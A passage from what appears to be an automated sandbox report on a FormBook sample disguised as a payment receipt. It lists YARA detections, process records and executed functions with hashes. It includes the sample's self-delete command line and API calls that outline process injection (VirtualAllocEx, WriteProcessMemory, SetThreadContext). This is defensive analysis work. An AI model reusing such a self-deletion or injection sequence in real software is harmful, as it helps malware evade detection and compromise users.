                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 5932 Parent PID: 4732

                                              General

                                              Start time:22:19:46
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x150000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 1132 Parent PID: 5932

                                              General

                                              Start time:22:19:47
                                              Start date:19/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: Final-Payment-Receipt.exe PID: 1692 Parent PID: 5576 Final-Payment-Receipt.exeCOMMON

                                                Executed Functions

                                                Function 055E74F0, Relevance: .3, Instructions: 251COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a0be0eb99142ec28ba4299b80e74fbffadb81e4457b96ecb387753435c8948a
                                                • Instruction ID: b040b90a83a351dd7179712cedae7fab078e321d5b69b8a43da7e171c2579265
                                                • Opcode Fuzzy Hash: 9a0be0eb99142ec28ba4299b80e74fbffadb81e4457b96ecb387753435c8948a
                                                • Instruction Fuzzy Hash: B1B124B4E052588FDB18DFA9D584BADBBF2FF49314F208069D409A7305EB349981CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0492CBE8, Relevance: .2, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02f98e56b1898339d20195d69e92230d8706bae02198e810af8466628fd30bec
                                                • Instruction ID: c404f2dead18b2379bf3875a1133a882a334baae2f9bad73699c0abe4759ba3d
                                                • Opcode Fuzzy Hash: 02f98e56b1898339d20195d69e92230d8706bae02198e810af8466628fd30bec
                                                • Instruction Fuzzy Hash: 06910674E01228CFDB54DFA9D988AADBBF2FF89304F10842AD409AB355DB71A941CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E74E0, Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78b78d00cbe1a52bc25fd867ae0dc7172ccc4692969705d1fbf902869f55e205
                                                • Instruction ID: 935dc92510353edc0a452126749859e19f88c6dfbd42dc87e487c2d23623936b
                                                • Opcode Fuzzy Hash: 78b78d00cbe1a52bc25fd867ae0dc7172ccc4692969705d1fbf902869f55e205
                                                • Instruction Fuzzy Hash: CA811474E05298CFDB18DFA9C548BADBBF2FB49314F20906AD409A7305EB349946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0492CBDA, Relevance: .2, Instructions: 197COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a2df06dd8c3bb64388a5221e038215b2a48aaa2a236427f7a160ca57196bfd8
                                                • Instruction ID: 17dbc6a4fd6a03788703caa636d6b05a5bbddac0ce2f65da0a02d41f89b00ec6
                                                • Opcode Fuzzy Hash: 2a2df06dd8c3bb64388a5221e038215b2a48aaa2a236427f7a160ca57196bfd8
                                                • Instruction Fuzzy Hash: 09811674E01228CFDB14DFA9D988AADBBF2FF89300F10846AD409AB355DB31A941CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055EBFA0, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8de46f0e983b3624e0e279c72c125dc6f94fd1c5493b669823646a8fe619fb3
                                                • Instruction ID: 93410f344f06d75f450396bf0ccd662527235b250fe908bc0fa6f9f14bbc62fd
                                                • Opcode Fuzzy Hash: b8de46f0e983b3624e0e279c72c125dc6f94fd1c5493b669823646a8fe619fb3
                                                • Instruction Fuzzy Hash: 15113630D04258CFCB08CFA9C8087EEBAF1BB4E311F14A469D411B3280C7389984DFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B6B88, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 008B6BF8
                                                • GetCurrentThread.KERNEL32 ref: 008B6C35
                                                • GetCurrentProcess.KERNEL32 ref: 008B6C72
                                                • GetCurrentThreadId.KERNEL32 ref: 008B6CCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7da594c495190c8fc96f988a07b9c9880318f4477a4b70481d698448397af6ed
                                                • Instruction ID: 6011c091d123a8542dae27b28cfdcab71bcfb93afe858881343de7ff206e4678
                                                • Opcode Fuzzy Hash: 7da594c495190c8fc96f988a07b9c9880318f4477a4b70481d698448397af6ed
                                                • Instruction Fuzzy Hash: 365153B09002498FDB14CFA9DA88BDEBFF0FF88314F248459E559A7361D7759884CB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B6B98, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 008B6BF8
                                                • GetCurrentThread.KERNEL32 ref: 008B6C35
                                                • GetCurrentProcess.KERNEL32 ref: 008B6C72
                                                • GetCurrentThreadId.KERNEL32 ref: 008B6CCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7394c3476aeee8776189f3f6acad7d143b04a41d2f0eec7c443375d0f5fefab0
                                                • Instruction ID: 54c5d74d87e5c367d3c3a94956917965366d64c45030aecd5886242d424c6925
                                                • Opcode Fuzzy Hash: 7394c3476aeee8776189f3f6acad7d143b04a41d2f0eec7c443375d0f5fefab0
                                                • Instruction Fuzzy Hash: 205153B09002498FDB14CFA9DA88BDEBBF0FF88314F248459E529A7350D775A884CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E9608, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055E983E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 325979ad521556e5207786835c31f4dca5fb4f8bf4c9e8b298e1cdd7a3c021e5
                                                • Instruction ID: 08a4103eb6ad422b3f582d765806d7fab613007c8cf7b3af3cd9c33d60fccee6
                                                • Opcode Fuzzy Hash: 325979ad521556e5207786835c31f4dca5fb4f8bf4c9e8b298e1cdd7a3c021e5
                                                • Instruction Fuzzy Hash: 66918971D042199FDF24CFA8C880BEEBBB2BF49314F158569E819A7240DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BBBB8, Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 008BBE0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2622ac2ca54029fbe56110ea325ffb02a923ff6c7c440a0ed2ef9b72ab4f38c4
                                                • Instruction ID: cf2e79e076c3c9477fc68bb14150a26aa7587e1d5f2085503c9738859ce0ba5d
                                                • Opcode Fuzzy Hash: 2622ac2ca54029fbe56110ea325ffb02a923ff6c7c440a0ed2ef9b72ab4f38c4
                                                • Instruction Fuzzy Hash: 58814470A00B058FD724DF2AC4507AABBF1FF88304F008929D58AD7B51DBB5E849CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BDC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BDD8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ef885e7a4ea5bfa481b1cfc221f7a57a9aa78a8d42e8b7a35098d47f73c9492f
                                                • Instruction ID: c2f86e4f65a1ff74f7b2a97a4b736dc930371af30b2118da3dc73322fc0acfd0
                                                • Opcode Fuzzy Hash: ef885e7a4ea5bfa481b1cfc221f7a57a9aa78a8d42e8b7a35098d47f73c9492f
                                                • Instruction Fuzzy Hash: E451CDB1D00349AFDB14CFA9C880ADEBBB1FF48314F24852AE819AB310D7749985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BDC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BDD8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 09897f1841fce663d2feda8e6bd9efa965a3621c002c0c3e12ec6f6f57d680e3
                                                • Instruction ID: d47e55c5e72d9819cc0eecbd7b9d80b075dc1cb273a8bb6aa31f4ed666a3f06c
                                                • Opcode Fuzzy Hash: 09897f1841fce663d2feda8e6bd9efa965a3621c002c0c3e12ec6f6f57d680e3
                                                • Instruction Fuzzy Hash: 7041ADB1D00309AFDB14CF99C884ADEBBB5FF48314F24852AE819AB350D775A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B6D49, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 53017b554df271e9cecc109195681611fb78349b05c33d203dc82c725acbed40
                                                • Instruction ID: 51ffebf2f2675001abb62e3837b9a3232fdb9cd20c42190c84e79581ac882564
                                                • Opcode Fuzzy Hash: 53017b554df271e9cecc109195681611fb78349b05c33d203dc82c725acbed40
                                                • Instruction Fuzzy Hash: 6F416676900249AFCB01CFA9D884ADEBFF5FF49320F18806AEA44A7351C3359955CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E92F0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055E9380
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 3984e8320bd4e52205406acf5e7096e67620e39630179bae9a5dc4590f5d1356
                                                • Instruction ID: b89e7553bd7aa901a47d96e5cdf0fa47fdd6e6e96aa5bb997c774ce0c082d7e8
                                                • Opcode Fuzzy Hash: 3984e8320bd4e52205406acf5e7096e67620e39630179bae9a5dc4590f5d1356
                                                • Instruction Fuzzy Hash: B82119B19043499FCF10CFA9C884BDEBBF5FF48324F15842AE919A7240D7789954CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8C59, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 055E8CDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 181b3a8982c1d14803af3ef77b39f7305d9d2f5f81aae3241bb93e8f629774ef
                                                • Instruction ID: 08dd979ee56dc211b0141241933022d5ec41ef2f00f31fecd05da651e40d5b75
                                                • Opcode Fuzzy Hash: 181b3a8982c1d14803af3ef77b39f7305d9d2f5f81aae3241bb93e8f629774ef
                                                • Instruction Fuzzy Hash: 97215971D042098FDB14DFAAC5847EEBBF4FF48264F148429D919A7240DB789945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B6DB8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: dc17321f3a9a51875aebef8e2c68c566adfb8f08061758128086582a196ff8ac
                                                • Instruction ID: 9a81e95d291f442c433588d1a8cb50510ebe5273e763b229c0c9b00e47e215a8
                                                • Opcode Fuzzy Hash: dc17321f3a9a51875aebef8e2c68c566adfb8f08061758128086582a196ff8ac
                                                • Instruction Fuzzy Hash: B32103B5900248AFDB10CFA9D484ADEBFF4FF48324F15841AE954A7311D378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8C60, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 055E8CDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: ae419115210a60a7f821be18c1a66ed2bad7f3cbb70078d716f38e2d9b5666c4
                                                • Instruction ID: 8062460b76b7de49e485fd3e5f6c550cc2194916653c192d9fccf9c7db493407
                                                • Opcode Fuzzy Hash: ae419115210a60a7f821be18c1a66ed2bad7f3cbb70078d716f38e2d9b5666c4
                                                • Instruction Fuzzy Hash: 252137719043099FCB10CFAAC4847EEBBF4FF48224F158429D919A7240DB789945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E9410, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055E9490
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: d73db0a882b67fa79a348935203d073dea7fb3fc37c570fa122a45cd5a38916b
                                                • Instruction ID: 49d669e06b84b9eb240dd7f592e483b00b9f89abb6f54e1bb5ed4f137f25cde2
                                                • Opcode Fuzzy Hash: d73db0a882b67fa79a348935203d073dea7fb3fc37c570fa122a45cd5a38916b
                                                • Instruction Fuzzy Hash: 1C2116B1C003499FCB10CFAAC880BDEBBF5FF48324F158429E919A7240D7749944CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B6DC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: b0c7da707c99615ad26f13bf68d226370f9c543a2ac996b450950b3d801e1716
                                                • Instruction ID: 7cf17a9937bc509b26f43ff21e79c25623211fe590ac3526280bde02b7dd2c96
                                                • Opcode Fuzzy Hash: b0c7da707c99615ad26f13bf68d226370f9c543a2ac996b450950b3d801e1716
                                                • Instruction Fuzzy Hash: A921C6B5900249AFDB10CFA9D484ADEFBF4FB48324F14841AE915A7310D374A954CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BB0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BBE89,00000800,00000000,00000000), ref: 008BC09A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a1db6cf5caab3a95a55b46ec557ccfd17eba8a463343129816bac7edb85ed8f3
                                                • Instruction ID: 9d254cb641ab955db030b78695fdeaa5511a3ee657eb43c3118859259794de9f
                                                • Opcode Fuzzy Hash: a1db6cf5caab3a95a55b46ec557ccfd17eba8a463343129816bac7edb85ed8f3
                                                • Instruction Fuzzy Hash: 311103B2904609DFCB20DF9AD444BDEFBF4EB88364F14842AD915A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BC028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BBE89,00000800,00000000,00000000), ref: 008BC09A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: bb22c572f90f9eab4cc847bbba96fe858b1cb1f25cfb5770d5e7a7198f7e9904
                                                • Instruction ID: dd5894a8d6bf19f36247d7e5ad0e4579d4711fbfb268f2f6899a85397f4bf6df
                                                • Opcode Fuzzy Hash: bb22c572f90f9eab4cc847bbba96fe858b1cb1f25cfb5770d5e7a7198f7e9904
                                                • Instruction Fuzzy Hash: 9011F4B28002499FCB10DFA9D484BDEFBF4EB48324F15851AD855A7600C375A94ACFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8B78, Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: f1c315304d05402fee65bc780d7a7aa672cb250e3b2a44856ff3d253d0a403b1
                                                • Instruction ID: 9a263906752b3974963de4bc83b385fa7791cec76fcaf16f69e6d0782f0ae158
                                                • Opcode Fuzzy Hash: f1c315304d05402fee65bc780d7a7aa672cb250e3b2a44856ff3d253d0a403b1
                                                • Instruction Fuzzy Hash: E11188B1D042498FCB24DFAAC4447DEFBF4EB88224F148429C519B7200CB389945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E9200, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055E926E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5621539086b6e23e0bd76b1ca7e0f4ad84ee1135a25e3f0b7c1e8761e579c72f
                                                • Instruction ID: 71e3652aeeb207334a6a64cfc5fed9bd7de838875250b95824977aa7f6f7738f
                                                • Opcode Fuzzy Hash: 5621539086b6e23e0bd76b1ca7e0f4ad84ee1135a25e3f0b7c1e8761e579c72f
                                                • Instruction Fuzzy Hash: 4A1137729042499FCF20DFAAC844BDFBBF5EF88324F158819D916A7250C7759944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8B80, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 5b109992f29f33a1cdeaa4376fb28e4f398d249af855fae1994447b9daa18dfe
                                                • Instruction ID: d6c3f573629e1f150815b0d35429c68b6a28166dc67aadfd4fc0586ba3925063
                                                • Opcode Fuzzy Hash: 5b109992f29f33a1cdeaa4376fb28e4f398d249af855fae1994447b9daa18dfe
                                                • Instruction Fuzzy Hash: 54113AB1D043498FCB24DFAAC4447DEFBF8EF88224F158429C515B7240CB74A945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BBDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 008BBE0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 07a78f95bca7b2278ecd6e8e41f03b9471cb78aaecdcfc3165d342a6d11d20fa
                                                • Instruction ID: 67bef7bbba68074d9f88d17295550a9ac3eb04ea06aa1b18c6b7c387f84644e4
                                                • Opcode Fuzzy Hash: 07a78f95bca7b2278ecd6e8e41f03b9471cb78aaecdcfc3165d342a6d11d20fa
                                                • Instruction Fuzzy Hash: 7111DFB6C002498FCB20CF9AD444BDEFBF4EB88324F15842AD919A7610D3B9A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8E48, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 055EB9DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 3c3b20c9a28a4ba4154d7905587f8d28a78cd8152aeb35db5def0403f5e110f0
                                                • Instruction ID: cad95163751301f1bcd85d47bb45faa3353df5df772d158dfe236262cf9fd327
                                                • Opcode Fuzzy Hash: 3c3b20c9a28a4ba4154d7905587f8d28a78cd8152aeb35db5def0403f5e110f0
                                                • Instruction Fuzzy Hash: EC11F2B58043499FCB20DF9AD884BEEBBF8FB48324F14841AE955A7200C374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055ED0B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 055ED108
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: cfbe1be3617f00a7d8254305f6efc20c52be26fb74a1b14b16290530f2fd590b
                                                • Instruction ID: efdd08d12a9d7b0280fa694c1f60951aab345677dfb3048af02c9db57e5cf711
                                                • Opcode Fuzzy Hash: cfbe1be3617f00a7d8254305f6efc20c52be26fb74a1b14b16290530f2fd590b
                                                • Instruction Fuzzy Hash: 711130B28003098FCB20DF99C884BDEBBF4EB48324F14842AD959A7240D738A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BDEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowLongW.USER32(?,?,?), ref: 008BDF1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LongWindow
                                                • String ID:
                                                • API String ID: 1378638983-0
                                                • Opcode ID: a56888371e4c34b183f67d3119588a19ce35e1fb0dec1e963a84e2aacc934dad
                                                • Instruction ID: 85851e839f3e5d0a812a8957fbbaaf8e92b62ce6c98b89a2c66bf396fb7b7fac
                                                • Opcode Fuzzy Hash: a56888371e4c34b183f67d3119588a19ce35e1fb0dec1e963a84e2aacc934dad
                                                • Instruction Fuzzy Hash: FC11D0B58043499FDB20DF99D484BDEBBF8EB48324F14841AE955A7700D374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BDEB9, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowLongW.USER32(?,?,?), ref: 008BDF1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LongWindow
                                                • String ID:
                                                • API String ID: 1378638983-0
                                                • Opcode ID: 44cec234d22b65959dab891a5bce1d5a78497e4070fb869f09a70603b9a0229c
                                                • Instruction ID: c77e0180ccfb9e1fe4b757ff0a20bfd915ffac76946ba7d72880deb8f7c1eb71
                                                • Opcode Fuzzy Hash: 44cec234d22b65959dab891a5bce1d5a78497e4070fb869f09a70603b9a0229c
                                                • Instruction Fuzzy Hash: A51100B69002098FDB10CF99D484BDEFBF8FB48324F14841AD919A7740D374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E8C21, Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
